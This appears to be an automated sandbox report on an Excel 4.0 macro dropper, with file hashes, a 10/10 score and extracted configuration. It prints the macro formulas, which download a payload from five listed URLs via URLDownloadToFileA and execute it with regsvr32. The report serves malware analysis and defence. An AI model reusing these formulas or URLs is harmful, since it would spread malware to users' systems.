General

  • Target

    91a89e29ceb93243c57923232c3931fbefa2b126ca599bac44a079a7500dd858

  • Size

    91KB

  • Sample

    241120-m8apxswfpk

  • MD5

    e5cc30e8b27a574c39877aad42acaf64

  • SHA1

    d519e91f26326a0a2be0c2b7bfce5e092da50b1f

  • SHA256

    91a89e29ceb93243c57923232c3931fbefa2b126ca599bac44a079a7500dd858

  • SHA512

    6bb573f31fd747a01ae72d627310418b8935fffb08faef938b97a382a628ca3e6b0eb5f0426cb33462dd99f1798ae73187dbe7a1962e35c63e2bb63ae47407dd

  • SSDEEP

    1536:tdNlX2L2nyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xX0bIS:td32KyVEoBo6hKb4llGsQjbxXS

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/

https://dev.subs2me.com/wp-includes/EMa/

https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/

https://yanapiri.com/upeatv/9IZP9RfbH338pFPI/

https://gurmitjaswal.ca/frer-hate/LW37erwSAhgU/

Attributes
  • formulas

    =FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/","..\dw1.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dev.subs2me.com/wp-includes/EMa/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://yanapiri.com/upeatv/9IZP9RfbH338pFPI/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://gurmitjaswal.ca/frer-hate/LW37erwSAhgU/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dw1.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/

xlm40.dropper

https://dev.subs2me.com/wp-includes/EMa/

xlm40.dropper

https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/

Targets

    • Target

      91a89e29ceb93243c57923232c3931fbefa2b126ca599bac44a079a7500dd858

    • Size

      91KB

    • MD5

      e5cc30e8b27a574c39877aad42acaf64

    • SHA1

      d519e91f26326a0a2be0c2b7bfce5e092da50b1f

    • SHA256

      91a89e29ceb93243c57923232c3931fbefa2b126ca599bac44a079a7500dd858

    • SHA512

      6bb573f31fd747a01ae72d627310418b8935fffb08faef938b97a382a628ca3e6b0eb5f0426cb33462dd99f1798ae73187dbe7a1962e35c63e2bb63ae47407dd

    • SSDEEP

      1536:tdNlX2L2nyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xX0bIS:td32KyVEoBo6hKb4llGsQjbxXS

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks